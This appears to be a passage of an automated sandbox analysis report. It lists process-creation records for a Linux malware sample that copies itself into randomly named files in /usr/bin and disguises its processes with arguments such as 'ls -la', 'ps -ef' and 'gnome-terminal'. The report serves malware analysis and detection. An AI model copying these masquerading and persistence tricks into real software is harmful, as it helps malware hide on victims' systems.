MD5 hash:	c2be7f6f3d8a2dd22bb027877353c35f

Chronological Activities

Analysis Process: ksagqhmoao PID: 6550, Parent PID: 6546

General

Start time (UTC):	14:29:12
Start date (UTC):	03/01/2025
Path:	/usr/bin/ksagqhmoao
Arguments:	-
File size:	548649 bytes
MD5 hash:	c2be7f6f3d8a2dd22bb027877353c35f

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6547, Parent PID: 6261

General

Start time (UTC):	14:29:11
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6548, Parent PID: 6547

General

Start time (UTC):	14:29:12
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: ksagqhmoao PID: 6548, Parent PID: 6547

General

Start time (UTC):	14:29:12
Start date (UTC):	03/01/2025
Path:	/usr/bin/ksagqhmoao
Arguments:	/usr/bin/ksagqhmoao "sleep 1" 6261
File size:	548649 bytes
MD5 hash:	c2be7f6f3d8a2dd22bb027877353c35f

Chronological Activities

Analysis Process: ksagqhmoao PID: 6554, Parent PID: 6548

General

Start time (UTC):	14:29:12
Start date (UTC):	03/01/2025
Path:	/usr/bin/ksagqhmoao
Arguments:	-
File size:	548649 bytes
MD5 hash:	c2be7f6f3d8a2dd22bb027877353c35f

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6549, Parent PID: 6261

General

Start time (UTC):	14:29:12
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6551, Parent PID: 6549

General

Start time (UTC):	14:29:12
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: ksagqhmoao PID: 6551, Parent PID: 6549

General

Start time (UTC):	14:29:12
Start date (UTC):	03/01/2025
Path:	/usr/bin/ksagqhmoao
Arguments:	/usr/bin/ksagqhmoao "ls -la" 6261
File size:	548649 bytes
MD5 hash:	c2be7f6f3d8a2dd22bb027877353c35f

Chronological Activities

Analysis Process: ksagqhmoao PID: 6555, Parent PID: 6551

General

Start time (UTC):	14:29:12
Start date (UTC):	03/01/2025
Path:	/usr/bin/ksagqhmoao
Arguments:	-
File size:	548649 bytes
MD5 hash:	c2be7f6f3d8a2dd22bb027877353c35f

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6552, Parent PID: 6261

General

Start time (UTC):	14:29:12
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6553, Parent PID: 6552

General

Start time (UTC):	14:29:12
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: ksagqhmoao PID: 6553, Parent PID: 6552

General

Start time (UTC):	14:29:12
Start date (UTC):	03/01/2025
Path:	/usr/bin/ksagqhmoao
Arguments:	/usr/bin/ksagqhmoao "ls -la" 6261
File size:	548649 bytes
MD5 hash:	c2be7f6f3d8a2dd22bb027877353c35f

Chronological Activities

Analysis Process: ksagqhmoao PID: 6556, Parent PID: 6553

General

Start time (UTC):	14:29:12
Start date (UTC):	03/01/2025
Path:	/usr/bin/ksagqhmoao
Arguments:	-
File size:	548649 bytes
MD5 hash:	c2be7f6f3d8a2dd22bb027877353c35f

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6559, Parent PID: 6261

General

Start time (UTC):	14:29:17
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6560, Parent PID: 6559

General

Start time (UTC):	14:29:17
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: snluqxjnyb PID: 6560, Parent PID: 6559

General

Start time (UTC):	14:29:17
Start date (UTC):	03/01/2025
Path:	/usr/bin/snluqxjnyb
Arguments:	/usr/bin/snluqxjnyb "netstat -an" 6261
File size:	548649 bytes
MD5 hash:	b711ff9d714c1e77683e9a8cda370270

Chronological Activities

Analysis Process: snluqxjnyb PID: 6561, Parent PID: 6560

General

Start time (UTC):	14:29:17
Start date (UTC):	03/01/2025
Path:	/usr/bin/snluqxjnyb
Arguments:	-
File size:	548649 bytes
MD5 hash:	b711ff9d714c1e77683e9a8cda370270

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6562, Parent PID: 6261

General

Start time (UTC):	14:29:17
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6563, Parent PID: 6562

General

Start time (UTC):	14:29:17
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: snluqxjnyb PID: 6563, Parent PID: 6562

General

Start time (UTC):	14:29:17
Start date (UTC):	03/01/2025
Path:	/usr/bin/snluqxjnyb
Arguments:	/usr/bin/snluqxjnyb "sleep 1" 6261
File size:	548649 bytes
MD5 hash:	b711ff9d714c1e77683e9a8cda370270

Chronological Activities

Analysis Process: snluqxjnyb PID: 6566, Parent PID: 6563

General

Start time (UTC):	14:29:17
Start date (UTC):	03/01/2025
Path:	/usr/bin/snluqxjnyb
Arguments:	-
File size:	548649 bytes
MD5 hash:	b711ff9d714c1e77683e9a8cda370270

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6564, Parent PID: 6261

General

Start time (UTC):	14:29:17
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6565, Parent PID: 6564

General

Start time (UTC):	14:29:17
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: snluqxjnyb PID: 6565, Parent PID: 6564

General

Start time (UTC):	14:29:17
Start date (UTC):	03/01/2025
Path:	/usr/bin/snluqxjnyb
Arguments:	/usr/bin/snluqxjnyb "cd /etc" 6261
File size:	548649 bytes
MD5 hash:	b711ff9d714c1e77683e9a8cda370270

Chronological Activities

Analysis Process: snluqxjnyb PID: 6569, Parent PID: 6565

General

Start time (UTC):	14:29:17
Start date (UTC):	03/01/2025
Path:	/usr/bin/snluqxjnyb
Arguments:	-
File size:	548649 bytes
MD5 hash:	b711ff9d714c1e77683e9a8cda370270

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6567, Parent PID: 6261

General

Start time (UTC):	14:29:17
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6568, Parent PID: 6567

General

Start time (UTC):	14:29:17
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: snluqxjnyb PID: 6568, Parent PID: 6567

General

Start time (UTC):	14:29:17
Start date (UTC):	03/01/2025
Path:	/usr/bin/snluqxjnyb
Arguments:	/usr/bin/snluqxjnyb "grep \"A\"" 6261
File size:	548649 bytes
MD5 hash:	b711ff9d714c1e77683e9a8cda370270

Chronological Activities

Analysis Process: snluqxjnyb PID: 6572, Parent PID: 6568

General

Start time (UTC):	14:29:17
Start date (UTC):	03/01/2025
Path:	/usr/bin/snluqxjnyb
Arguments:	-
File size:	548649 bytes
MD5 hash:	b711ff9d714c1e77683e9a8cda370270

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6570, Parent PID: 6261

General

Start time (UTC):	14:29:17
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6571, Parent PID: 6570

General

Start time (UTC):	14:29:17
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: snluqxjnyb PID: 6571, Parent PID: 6570

General

Start time (UTC):	14:29:17
Start date (UTC):	03/01/2025
Path:	/usr/bin/snluqxjnyb
Arguments:	/usr/bin/snluqxjnyb top 6261
File size:	548649 bytes
MD5 hash:	b711ff9d714c1e77683e9a8cda370270

Chronological Activities

Analysis Process: snluqxjnyb PID: 6573, Parent PID: 6571

General

Start time (UTC):	14:29:17
Start date (UTC):	03/01/2025
Path:	/usr/bin/snluqxjnyb
Arguments:	-
File size:	548649 bytes
MD5 hash:	b711ff9d714c1e77683e9a8cda370270

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6576, Parent PID: 6261

General

Start time (UTC):	14:29:22
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6577, Parent PID: 6576

General

Start time (UTC):	14:29:22
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: rfdcbxuezd PID: 6577, Parent PID: 6576

General

Start time (UTC):	14:29:22
Start date (UTC):	03/01/2025
Path:	/usr/bin/rfdcbxuezd
Arguments:	/usr/bin/rfdcbxuezd "ps -ef" 6261
File size:	548649 bytes
MD5 hash:	bcf7ec16fced4436fe9502643e9c86a8

Chronological Activities

Analysis Process: rfdcbxuezd PID: 6578, Parent PID: 6577

General

Start time (UTC):	14:29:22
Start date (UTC):	03/01/2025
Path:	/usr/bin/rfdcbxuezd
Arguments:	-
File size:	548649 bytes
MD5 hash:	bcf7ec16fced4436fe9502643e9c86a8

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6579, Parent PID: 6261

General

Start time (UTC):	14:29:22
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6580, Parent PID: 6579

General

Start time (UTC):	14:29:22
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: rfdcbxuezd PID: 6580, Parent PID: 6579

General

Start time (UTC):	14:29:22
Start date (UTC):	03/01/2025
Path:	/usr/bin/rfdcbxuezd
Arguments:	/usr/bin/rfdcbxuezd "cat resolv.conf" 6261
File size:	548649 bytes
MD5 hash:	bcf7ec16fced4436fe9502643e9c86a8

Chronological Activities

Analysis Process: rfdcbxuezd PID: 6582, Parent PID: 6580

General

Start time (UTC):	14:29:22
Start date (UTC):	03/01/2025
Path:	/usr/bin/rfdcbxuezd
Arguments:	-
File size:	548649 bytes
MD5 hash:	bcf7ec16fced4436fe9502643e9c86a8

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6581, Parent PID: 6261

General

Start time (UTC):	14:29:22
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6583, Parent PID: 6581

General

Start time (UTC):	14:29:22
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: rfdcbxuezd PID: 6583, Parent PID: 6581

General

Start time (UTC):	14:29:22
Start date (UTC):	03/01/2025
Path:	/usr/bin/rfdcbxuezd
Arguments:	/usr/bin/rfdcbxuezd "cd /etc" 6261
File size:	548649 bytes
MD5 hash:	bcf7ec16fced4436fe9502643e9c86a8

Chronological Activities

Analysis Process: rfdcbxuezd PID: 6586, Parent PID: 6583

General

Start time (UTC):	14:29:23
Start date (UTC):	03/01/2025
Path:	/usr/bin/rfdcbxuezd
Arguments:	-
File size:	548649 bytes
MD5 hash:	bcf7ec16fced4436fe9502643e9c86a8

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6584, Parent PID: 6261

General

Start time (UTC):	14:29:22
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6585, Parent PID: 6584

General

Start time (UTC):	14:29:22
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: rfdcbxuezd PID: 6585, Parent PID: 6584

General

Start time (UTC):	14:29:22
Start date (UTC):	03/01/2025
Path:	/usr/bin/rfdcbxuezd
Arguments:	/usr/bin/rfdcbxuezd "cd /etc" 6261
File size:	548649 bytes
MD5 hash:	bcf7ec16fced4436fe9502643e9c86a8

Chronological Activities

Analysis Process: rfdcbxuezd PID: 6589, Parent PID: 6585

General

Start time (UTC):	14:29:23
Start date (UTC):	03/01/2025
Path:	/usr/bin/rfdcbxuezd
Arguments:	-
File size:	548649 bytes
MD5 hash:	bcf7ec16fced4436fe9502643e9c86a8

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6587, Parent PID: 6261

General

Start time (UTC):	14:29:23
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6588, Parent PID: 6587

General

Start time (UTC):	14:29:23
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: rfdcbxuezd PID: 6588, Parent PID: 6587

General

Start time (UTC):	14:29:23
Start date (UTC):	03/01/2025
Path:	/usr/bin/rfdcbxuezd
Arguments:	/usr/bin/rfdcbxuezd id 6261
File size:	548649 bytes
MD5 hash:	bcf7ec16fced4436fe9502643e9c86a8

Chronological Activities

Analysis Process: rfdcbxuezd PID: 6590, Parent PID: 6588

General

Start time (UTC):	14:29:23
Start date (UTC):	03/01/2025
Path:	/usr/bin/rfdcbxuezd
Arguments:	-
File size:	548649 bytes
MD5 hash:	bcf7ec16fced4436fe9502643e9c86a8

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6593, Parent PID: 6261

General

Start time (UTC):	14:29:28
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6594, Parent PID: 6593

General

Start time (UTC):	14:29:28
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: nqjbkvhncc PID: 6594, Parent PID: 6593

General

Start time (UTC):	14:29:28
Start date (UTC):	03/01/2025
Path:	/usr/bin/nqjbkvhncc
Arguments:	/usr/bin/nqjbkvhncc "cat resolv.conf" 6261
File size:	548649 bytes
MD5 hash:	19502630540ed5c815ecc4fe6cd2d733

Chronological Activities

Analysis Process: nqjbkvhncc PID: 6595, Parent PID: 6594

General

Start time (UTC):	14:29:28
Start date (UTC):	03/01/2025
Path:	/usr/bin/nqjbkvhncc
Arguments:	-
File size:	548649 bytes
MD5 hash:	19502630540ed5c815ecc4fe6cd2d733

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6596, Parent PID: 6261

General

Start time (UTC):	14:29:28
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6597, Parent PID: 6596

General

Start time (UTC):	14:29:28
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: nqjbkvhncc PID: 6597, Parent PID: 6596

General

Start time (UTC):	14:29:28
Start date (UTC):	03/01/2025
Path:	/usr/bin/nqjbkvhncc
Arguments:	/usr/bin/nqjbkvhncc "sleep 1" 6261
File size:	548649 bytes
MD5 hash:	19502630540ed5c815ecc4fe6cd2d733

Chronological Activities

Analysis Process: nqjbkvhncc PID: 6600, Parent PID: 6597

General

Start time (UTC):	14:29:28
Start date (UTC):	03/01/2025
Path:	/usr/bin/nqjbkvhncc
Arguments:	-
File size:	548649 bytes
MD5 hash:	19502630540ed5c815ecc4fe6cd2d733

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6598, Parent PID: 6261

General

Start time (UTC):	14:29:28
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6599, Parent PID: 6598

General

Start time (UTC):	14:29:28
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: nqjbkvhncc PID: 6599, Parent PID: 1860

General

Start time (UTC):	14:29:28
Start date (UTC):	03/01/2025
Path:	/usr/bin/nqjbkvhncc
Arguments:	/usr/bin/nqjbkvhncc gnome-terminal 6261
File size:	548649 bytes
MD5 hash:	19502630540ed5c815ecc4fe6cd2d733

Chronological Activities

Analysis Process: nqjbkvhncc PID: 6605, Parent PID: 6599

General

Start time (UTC):	14:29:28
Start date (UTC):	03/01/2025
Path:	/usr/bin/nqjbkvhncc
Arguments:	-
File size:	548649 bytes
MD5 hash:	19502630540ed5c815ecc4fe6cd2d733

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6601, Parent PID: 6261

General

Start time (UTC):	14:29:28
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6602, Parent PID: 6601

General

Start time (UTC):	14:29:28
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: nqjbkvhncc PID: 6602, Parent PID: 1860

General

Start time (UTC):	14:29:28
Start date (UTC):	03/01/2025
Path:	/usr/bin/nqjbkvhncc
Arguments:	/usr/bin/nqjbkvhncc gnome-terminal 6261
File size:	548649 bytes
MD5 hash:	19502630540ed5c815ecc4fe6cd2d733

Chronological Activities

Analysis Process: nqjbkvhncc PID: 6606, Parent PID: 6602

General

Start time (UTC):	14:29:28
Start date (UTC):	03/01/2025
Path:	/usr/bin/nqjbkvhncc
Arguments:	-
File size:	548649 bytes
MD5 hash:	19502630540ed5c815ecc4fe6cd2d733

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6603, Parent PID: 6261

General

Start time (UTC):	14:29:28
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6604, Parent PID: 6603

General

Start time (UTC):	14:29:28
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: nqjbkvhncc PID: 6604, Parent PID: 1860

General

Start time (UTC):	14:29:28
Start date (UTC):	03/01/2025
Path:	/usr/bin/nqjbkvhncc
Arguments:	/usr/bin/nqjbkvhncc ifconfig 6261
File size:	548649 bytes
MD5 hash:	19502630540ed5c815ecc4fe6cd2d733

Chronological Activities

Analysis Process: nqjbkvhncc PID: 6607, Parent PID: 6604

General

Start time (UTC):	14:29:28
Start date (UTC):	03/01/2025
Path:	/usr/bin/nqjbkvhncc
Arguments:	-
File size:	548649 bytes
MD5 hash:	19502630540ed5c815ecc4fe6cd2d733

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6611, Parent PID: 6261

General

Start time (UTC):	14:29:33
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6612, Parent PID: 6611

General

Start time (UTC):	14:29:33
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: xzmsvqaqiz PID: 6612, Parent PID: 6611

General

Start time (UTC):	14:29:33
Start date (UTC):	03/01/2025
Path:	/usr/bin/xzmsvqaqiz
Arguments:	/usr/bin/xzmsvqaqiz "ls -la" 6261
File size:	548660 bytes
MD5 hash:	9f80890f560ed6066115f1895d821440

Chronological Activities

Analysis Process: xzmsvqaqiz PID: 6617, Parent PID: 6612

General

Start time (UTC):	14:29:33
Start date (UTC):	03/01/2025
Path:	/usr/bin/xzmsvqaqiz
Arguments:	-
File size:	548660 bytes
MD5 hash:	9f80890f560ed6066115f1895d821440

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6613, Parent PID: 6261

General

Start time (UTC):	14:29:33
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6614, Parent PID: 6613

General

Start time (UTC):	14:29:33
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: xzmsvqaqiz PID: 6614, Parent PID: 1860

General

Start time (UTC):	14:29:33
Start date (UTC):	03/01/2025
Path:	/usr/bin/xzmsvqaqiz
Arguments:	/usr/bin/xzmsvqaqiz "sleep 1" 6261
File size:	548660 bytes
MD5 hash:	9f80890f560ed6066115f1895d821440

Chronological Activities

Analysis Process: xzmsvqaqiz PID: 6621, Parent PID: 6614

General

Start time (UTC):	14:29:33
Start date (UTC):	03/01/2025
Path:	/usr/bin/xzmsvqaqiz
Arguments:	-
File size:	548660 bytes
MD5 hash:	9f80890f560ed6066115f1895d821440

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6615, Parent PID: 6261

General

Start time (UTC):	14:29:33
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6616, Parent PID: 6615

General

Start time (UTC):	14:29:33
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: xzmsvqaqiz PID: 6616, Parent PID: 1860

General

Start time (UTC):	14:29:33
Start date (UTC):	03/01/2025
Path:	/usr/bin/xzmsvqaqiz
Arguments:	/usr/bin/xzmsvqaqiz "ps -ef" 6261
File size:	548660 bytes
MD5 hash:	9f80890f560ed6066115f1895d821440

Chronological Activities

Analysis Process: xzmsvqaqiz PID: 6623, Parent PID: 6616

General

Start time (UTC):	14:29:33
Start date (UTC):	03/01/2025
Path:	/usr/bin/xzmsvqaqiz
Arguments:	-
File size:	548660 bytes
MD5 hash:	9f80890f560ed6066115f1895d821440

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6618, Parent PID: 6261

General

Start time (UTC):	14:29:33
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6619, Parent PID: 6618

General

Start time (UTC):	14:29:33
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: xzmsvqaqiz PID: 6619, Parent PID: 1860

General

Start time (UTC):	14:29:33
Start date (UTC):	03/01/2025
Path:	/usr/bin/xzmsvqaqiz
Arguments:	/usr/bin/xzmsvqaqiz "grep \"A\"" 6261
File size:	548660 bytes
MD5 hash:	9f80890f560ed6066115f1895d821440

Chronological Activities

Analysis Process: xzmsvqaqiz PID: 6624, Parent PID: 6619

General

Start time (UTC):	14:29:33
Start date (UTC):	03/01/2025
Path:	/usr/bin/xzmsvqaqiz
Arguments:	-
File size:	548660 bytes
MD5 hash:	9f80890f560ed6066115f1895d821440

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6620, Parent PID: 6261

General

Start time (UTC):	14:29:33
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6622, Parent PID: 6620

General

Start time (UTC):	14:29:33
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: xzmsvqaqiz PID: 6622, Parent PID: 1860

General

Start time (UTC):	14:29:33
Start date (UTC):	03/01/2025
Path:	/usr/bin/xzmsvqaqiz
Arguments:	/usr/bin/xzmsvqaqiz ifconfig 6261
File size:	548660 bytes
MD5 hash:	9f80890f560ed6066115f1895d821440

Chronological Activities

Analysis Process: xzmsvqaqiz PID: 6625, Parent PID: 6622

General

Start time (UTC):	14:29:33
Start date (UTC):	03/01/2025
Path:	/usr/bin/xzmsvqaqiz
Arguments:	-
File size:	548660 bytes
MD5 hash:	9f80890f560ed6066115f1895d821440

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6629, Parent PID: 6261

General

Start time (UTC):	14:29:38
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6630, Parent PID: 6629

General

Start time (UTC):	14:29:38
Start date (UTC):	03/01/2025
Path:	/tmp/UDMp3dZ7nc.elf
Arguments:	-
File size:	548638 bytes
MD5 hash:	22cd21f5cfc3ea409f3a05585d903949

Chronological Activities

Analysis Process: bbdupdfrbl PID: 6630, Parent PID: 6629

General

Start time (UTC):	14:29:38
Start date (UTC):	03/01/2025
Path:	/usr/bin/bbdupdfrbl
Arguments:	/usr/bin/bbdupdfrbl "ifconfig eth0" 6261
File size:	548660 bytes
MD5 hash:	ce8ed5c0103d476aae51c2e02825f9cd

Chronological Activities

Analysis Process: bbdupdfrbl PID: 6635, Parent PID: 6630

General

Start time (UTC):	14:29:38
Start date (UTC):	03/01/2025
Path:	/usr/bin/bbdupdfrbl
Arguments:	-
File size:	548660 bytes
MD5 hash:	ce8ed5c0103d476aae51c2e02825f9cd

Chronological Activities

Analysis Process: UDMp3dZ7nc.elf PID: 6631, Parent PID: 6261

General

